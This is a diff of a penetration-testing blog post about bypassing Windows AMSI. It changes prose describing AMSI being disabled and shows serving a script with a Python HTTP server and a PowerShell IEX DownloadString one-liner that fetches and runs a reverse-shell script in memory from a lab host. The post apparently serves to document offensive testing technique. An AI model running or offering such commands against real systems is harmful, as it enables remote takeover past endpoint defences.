Kwangyun/Kwangyun.github.io/_posts/2023-07-28-Bypassing-AMSI-2023.md

 ```

-After implementing effective obfuscation techniques, the tester proceeded by hosting a Python web server on port 8443 to serve a PowerShell Reverse Shell Scrip.
+After implementing effective obfuscation techniques, the payload is dropped in the PowerShell command prompt.
+The `ASMIScanBuffer.dll` returns an `Invalid Argument` and ends the AMSI program without being able to scan any code.
+With AMSI neutralized, the tester proceeded by hosting a Python web server on port 8443 to serve a PowerShell Reverse Shell Scrip.
 ```bash
 python3 -m http.server 8443
 ```

-Taking advantage of the AMSI.dll malfunction, the tester successfully initiated a reverse TCP connection via PowerShell, executing the following command in memory:
+Taking advantage of the payload, the tester successfully initiated a reverse TCP connection via PowerShell, executing the script in memory:
 ```bash
 IEX (New-Object Net.WebClient).DownloadString('http://192.168.20.128:8443/Invoke-PowerShellTcp.ps1')
 ```